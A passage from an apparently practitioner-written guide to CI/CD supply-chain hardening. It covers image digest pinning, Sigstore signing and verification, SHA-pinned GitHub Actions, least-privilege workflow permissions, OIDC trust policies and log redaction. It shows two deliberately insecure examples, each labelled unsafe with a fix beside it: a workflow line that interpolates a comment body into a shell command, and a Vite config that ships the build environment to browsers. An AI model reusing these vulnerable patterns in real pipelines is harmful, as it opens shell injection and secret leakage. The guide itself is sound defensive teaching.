&lt;p&gt;&lt;strong&gt;The limit:&lt;/strong&gt; lifecycle gates block &lt;code&gt;preinstall&lt;/code&gt; / &lt;code&gt;install&lt;/code&gt; / &lt;code&gt;postinstall&lt;/code&gt;. They do not prevent module-load-time top-level execution when an attacker-controlled package gets &lt;code&gt;require()&lt;/code&gt;'d or &lt;code&gt;import&lt;/code&gt;'d during &lt;code&gt;vitest&lt;/code&gt;, &lt;code&gt;tsc&lt;/code&gt;, &lt;code&gt;eslint&lt;/code&gt;, or any other tool that imports your code graph. The &lt;code&gt;minimumReleaseAge&lt;/code&gt; cooldown (Boundary 2) is the layer behind that.&lt;/p&gt;

&lt;p&gt;Stack equivalents: pip's risky surface is &lt;code&gt;setup.py&lt;/code&gt; install hooks (mitigate with &lt;code&gt;--only-binary=:all:&lt;/code&gt;); Ruby's is &lt;code&gt;gem install&lt;/code&gt; running &lt;code&gt;extconf.rb&lt;/code&gt;; Cargo's is &lt;code&gt;build.rs&lt;/code&gt; (sandbox via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans); .NET's modern PackageReference does not run scripts (legacy &lt;code&gt;packages.config&lt;/code&gt; does); Maven and Gradle's are build plugins (audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; and &lt;code&gt;buildscript { dependencies }&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 2 Build-side: what runs during your build
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 5: Source → Image (Is our build environment trustworthy?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; base image tag rewrite, secrets baked into image layers.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pin every &lt;code&gt;FROM&lt;/code&gt; by &lt;code&gt;@sha256:&amp;lt;digest&amp;gt;&lt;/code&gt;.&lt;/strong&gt; Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Drop privileges with &lt;code&gt;USER&lt;/code&gt; before &lt;code&gt;CMD&lt;/code&gt;.&lt;/strong&gt; For Node images: &lt;code&gt;USER node&lt;/code&gt;. For nginx: switch to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt; (drop-in non-root replacement listening on 8080).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Never put secrets in &lt;code&gt;ARG&lt;/code&gt; defaults&lt;/strong&gt; they persist in &lt;code&gt;docker history&lt;/code&gt;. Use BuildKit &lt;code&gt;--mount=type=secret&lt;/code&gt; for build-time secrets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hermetic builds for the highest tier.&lt;/strong&gt; Bazel &lt;code&gt;rules_oci&lt;/code&gt;, Nix &lt;code&gt;dockerTools&lt;/code&gt;, Chainguard's &lt;code&gt;apko&lt;/code&gt; + &lt;code&gt;melange&lt;/code&gt; produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 6: Image → Registry (Can downstream verify what we shipped?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; &lt;strong&gt;cosign keyless signing via Sigstore.&lt;/strong&gt; Sigstore is a free signing service; &lt;strong&gt;Fulcio&lt;/strong&gt; is its short-lived certificate authority; &lt;strong&gt;Rekor&lt;/strong&gt; is its public transparency log; the &lt;strong&gt;SET&lt;/strong&gt; (Signed Entry Timestamp) is Rekor's tamper-proof timestamp binding the signature to a moment when the cert was still valid. GitHub Actions OIDC issues a short-lived signing identity, Fulcio mints a certificate valid for ~10 minutes, and the signature is recorded in Rekor.&lt;/p&gt;

&lt;p&gt;Treat Rekor as load-bearing, not optional. The Fulcio cert expires almost immediately; what makes a keyless signature verifiable hours or years later is the Rekor inclusion proof. A &lt;code&gt;cosign verify&lt;/code&gt; that doesn't check the SET is meaningless after cert expiry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify with workflow-path anchoring&lt;/strong&gt;, not a loose org regex:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &amp;lt;image&amp;gt;@&amp;lt;digest&amp;gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s2"&gt;"^https://github&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;com/yourorg/yourrepo/&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;github/workflows/release&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml@refs/heads/main$"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-repository&lt;/span&gt; &lt;span class="s2"&gt;"yourorg/yourrepo"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-ref&lt;/span&gt; &lt;span class="s2"&gt;"refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An open &lt;code&gt;^https://github.com/yourorg/&lt;/code&gt; regex matches any workflow under the org including a malicious workflow added in a fork and run via &lt;code&gt;pull_request_target&lt;/code&gt;. Anchor on the workflow path, the ref, AND test the regex with a known-different workflow before relying on it. Unanchored regexes (missing &lt;code&gt;^&lt;/code&gt; or &lt;code&gt;$&lt;/code&gt;) match more workflows than you intended.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Signing alone does not satisfy SLSA&lt;/strong&gt; (Supply-chain Levels for Software Artifacts a framework grading build provenance trustworthiness). The signature proves who built the image, not how. SLSA Build L3 requires provenance attestations in &lt;code&gt;in-toto&lt;/code&gt; format (&lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt; predicate), produced by &lt;code&gt;cosign attest --predicate&lt;/code&gt; from a hardened, isolated builder such as &lt;code&gt;slsa-github-generator&lt;/code&gt;. Verify with &lt;code&gt;cosign verify-attestation&lt;/code&gt;. The signature is the foundation. The attestation chain is the rest of the building.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A signature you don't verify at deploy time is theatre.&lt;/strong&gt; Wire &lt;code&gt;cosign verify&lt;/code&gt; into a Kubernetes admission controller &lt;strong&gt;Kyverno&lt;/strong&gt; &lt;code&gt;verifyImages&lt;/code&gt;, &lt;strong&gt;Connaisseur&lt;/strong&gt;, or &lt;strong&gt;Sigstore policy-controller&lt;/strong&gt; so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native &lt;code&gt;gh attestation verify&lt;/code&gt; (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.&lt;/p&gt;

&lt;p&gt;Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via &lt;code&gt;cosign sign-blob&lt;/code&gt;. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, Microsoft same &lt;code&gt;cosign sign --identity-token&lt;/code&gt; flow, different &lt;code&gt;iss&lt;/code&gt; claim. PEP 740 attestations + &lt;code&gt;python -m sigstore&lt;/code&gt; cover Python wheels; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; covers Java JARs.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 7: Tag → Commit (What does this &lt;code&gt;uses:&lt;/code&gt; / include / plugin actually point to?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;This is the boundary tj-actions exploited.&lt;/strong&gt; A line like &lt;code&gt;uses: tj-actions/changed-files@v45&lt;/code&gt; resolves at build time to whatever commit the &lt;code&gt;v45&lt;/code&gt; tag currently references. Tags are mutable. Commit SHAs are not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; pin every external &lt;code&gt;uses:&lt;/code&gt; to a 40-character commit SHA with a tag comment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enforce in CI with &lt;code&gt;pinact run --check --verify&lt;/code&gt;. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack &lt;code&gt;pinact&lt;/code&gt; will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's &lt;code&gt;gh attestation verify&lt;/code&gt; for Action artifacts (GA 2024), &lt;code&gt;StepSecurity Harden-Runner&lt;/code&gt; for egress-policy + tampering detection on the runner, or human review of any flagged drift.&lt;/p&gt;

&lt;p&gt;When we started, none of our 110 &lt;code&gt;uses:&lt;/code&gt; lines were SHA-pinned. That included &lt;code&gt;pulumi/actions&lt;/code&gt; (cloud-deploy authority), &lt;code&gt;lasith-kg/dispatch-workflow&lt;/code&gt; (single maintainer), &lt;code&gt;aws-actions/configure-aws-credentials&lt;/code&gt; (×11), and &lt;code&gt;docker/build-push-action&lt;/code&gt; (×3, ECR push). They all are now, with a CI gate so they stay that way.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Translate to your CI:&lt;/strong&gt; GitLab &lt;code&gt;include:&lt;/code&gt; should pin &lt;code&gt;ref:&lt;/code&gt; to a SHA, not &lt;code&gt;main&lt;/code&gt;. Buildkite plugins should pin &lt;code&gt;plugin@&amp;lt;sha&amp;gt;&lt;/code&gt;, not &lt;code&gt;@v1&lt;/code&gt;. CircleCI orbs are best inlined or vendored. Jenkins shared libraries should pin &lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;. Bazel modules pin via &lt;code&gt;MODULE.bazel.lock&lt;/code&gt;. The control: no mutable references to third-party code anywhere in CI config.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with &lt;code&gt;permissions: write-all&lt;/code&gt; receives a &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; with write scopes across that repository's API surface contents, issues, pull requests, packages, deployments for the duration of that workflow run.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; default-deny at workflow level, grant per-job:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;       &lt;span class="c1"&gt;# for checkout&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;      &lt;span class="c1"&gt;# for AWS OIDC&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;zizmor&lt;/code&gt; (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running &lt;code&gt;permissions: write-all&lt;/code&gt;. Today none of them do.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reusable workflows (&lt;code&gt;workflow_call&lt;/code&gt;)&lt;/strong&gt; inherit the caller's &lt;code&gt;permissions:&lt;/code&gt; unless explicitly overridden. &lt;code&gt;secrets: inherit&lt;/code&gt; on the caller hands every repository secret to the callee. Pass secrets explicitly by name and re-declare &lt;code&gt;permissions:&lt;/code&gt; in every reusable workflow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt; is the single highest-severity GitHub Actions footgun.&lt;/strong&gt; Unlike &lt;code&gt;pull_request&lt;/code&gt;, it runs in the context of the base repository with the base repo's &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; and access to repository secrets. If you &lt;code&gt;actions/checkout&lt;/code&gt; the PR head, you've executed an attacker's code with privileged credentials. Default rule: never check out PR head code in a &lt;code&gt;pull_request_target&lt;/code&gt; workflow; never run third-party scripts inside one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Replace long-lived AWS keys with GitHub OIDC.&lt;/strong&gt; The role's trust policy restricts assumption to your repository's workflows; CI never holds a credential that survives the run. The footgun: a &lt;code&gt;sub&lt;/code&gt; condition like &lt;code&gt;repo:org/*:*&lt;/code&gt; hands AWS-role assumption to any workflow run from any branch, including a fork's PR. Anchor &lt;code&gt;sub&lt;/code&gt; to a specific repo + ref:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringLike"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:yourorg/yourrepo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For higher precision than &lt;code&gt;sub&lt;/code&gt;, use &lt;code&gt;job_workflow_ref&lt;/code&gt; it constrains to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.&lt;/p&gt;

&lt;p&gt;CI translations: GitLab CI uses &lt;code&gt;id_tokens:&lt;/code&gt; per-job and CI/CD job-token scope allowlists; Buildkite uses agent-queue ACLs and Vault Agent for secret distribution; CircleCI uses restricted contexts; Jenkins uses &lt;code&gt;withCredentials&lt;/code&gt; per-step plus folder-level credential isolation. Different YAML, same default-deny pattern.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 9: Untrusted input → Shell (CWE-78 in CI)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; GitHub-context fields like &lt;code&gt;github.event.comment.body&lt;/code&gt;, &lt;code&gt;pull_request.title&lt;/code&gt;, &lt;code&gt;head_ref&lt;/code&gt; are attacker-controlled. When interpolated directly into a &lt;code&gt;run:&lt;/code&gt; block, they become shell injection. The same class exists everywhere: GitLab &lt;code&gt;$CI_*&lt;/code&gt; from triggered events, Jenkins parameterised builds, Buildkite &lt;code&gt;meta-data&lt;/code&gt;, Azure &lt;code&gt;variables&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Unsafe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;BODY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}&lt;/span&gt;
&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$BODY"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the boundary the lede sat on. The fix was a four-line diff. The control that catches the next one (&lt;code&gt;actionlint&lt;/code&gt; for syntax + &lt;code&gt;zizmor&lt;/code&gt; for security patterns, both as required PR checks) was one commit. Cross-CI: &lt;code&gt;semgrep --config=p/ci&lt;/code&gt; covers most major vendors with one ruleset.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 3 Runtime-side: what ships and what leaks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; a &lt;code&gt;define&lt;/code&gt; block in your bundler (Vite, Webpack, esbuild, Rollup) that spreads &lt;code&gt;process.env&lt;/code&gt; into the client bundle. Frontend bundlers replace &lt;code&gt;process.env.X&lt;/code&gt; with the value at build time, so whatever was in the build host's env becomes a string literal in the JS shipped to every browser.&lt;/p&gt;

&lt;p&gt;We had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// vite.config.ts&lt;/span&gt;
&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// TODO: fix this later&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env.PUBLIC_API_URL&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;PUBLIC_API_URL&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;// explicit allowlist; nothing implicit&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same principle for &lt;code&gt;NEXT_PUBLIC_*&lt;/code&gt;, &lt;code&gt;VITE_*&lt;/code&gt;, &lt;code&gt;REACT_APP_*&lt;/code&gt;, &lt;code&gt;EXPO_PUBLIC_*&lt;/code&gt; env vars assume browser-readable, never put secrets behind these prefixes. Same failure mode in mobile too: Android &lt;code&gt;BuildConfig.API_KEY = "$apiKey"&lt;/code&gt; from a checked-in &lt;code&gt;gradle.properties&lt;/code&gt;; iOS API keys in &lt;code&gt;Info.plist&lt;/code&gt; or &lt;code&gt;xcconfig&lt;/code&gt;. Assume any string in the artefact is extractable.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; logging frameworks default to verbose. CloudWatch, Datadog, Sentry retain log lines for weeks. A &lt;code&gt;console.log(req)&lt;/code&gt; in a request handler dumps the &lt;code&gt;Authorization&lt;/code&gt; header to a 30-day-retention log, accessible to any engineer with read access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; redaction at the framework level (not per call-site):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="nx"&gt;pino&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;pino&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;logger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;pino&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;redact&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.cookie&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;config.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// catches Axios errors&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.password&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.token&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.secret&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="na"&gt;censor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;[REDACTED]&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The one that bit us: AxiosError objects carry the original request configuration, including &lt;code&gt;Authorization&lt;/code&gt; headers. &lt;code&gt;logger.error(msg, axiosErr)&lt;/code&gt; without redaction quietly dumps every bearer token your service has ever forwarded.&lt;/p&gt;

&lt;p&gt;Every mature logger has the primitive: &lt;code&gt;structlog&lt;/code&gt; processors (Python), &lt;code&gt;logback&lt;/code&gt;'s &lt;code&gt;MaskingPatternLayout&lt;/code&gt; (Java), &lt;code&gt;zap&lt;/code&gt; / &lt;code&gt;zerolog&lt;/code&gt; field hooks (Go), &lt;code&gt;tracing&lt;/code&gt; field filters (Rust), &lt;code&gt;Rails.config.filter_parameters&lt;/code&gt; (Ruby), &lt;code&gt;Serilog.Enrichers.Sensitive&lt;/code&gt; (.NET). Last line of defence regardless of stack: an &lt;strong&gt;OpenTelemetry Collector&lt;/strong&gt; with an &lt;code&gt;attributes/delete&lt;/code&gt; processor that scrubs in transit before logs reach Datadog or CloudWatch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The limit.&lt;/strong&gt; &lt;code&gt;pino&lt;/code&gt; redact is a denylist; it only scrubs the paths you list. Custom auth headers (&lt;code&gt;x-api-key&lt;/code&gt;, &lt;code&gt;x-vault-token&lt;/code&gt;), GraphQL &lt;code&gt;variables.password&lt;/code&gt;, &lt;code&gt;request.body.token&lt;/code&gt;, provider-specific shapes easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; vulnerable transitive dependency, no maintainer response, can't wait.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; force-pin the transitive with documented rationale and an expiry date:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"overrides"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"lodash-es"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"4.17.23"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
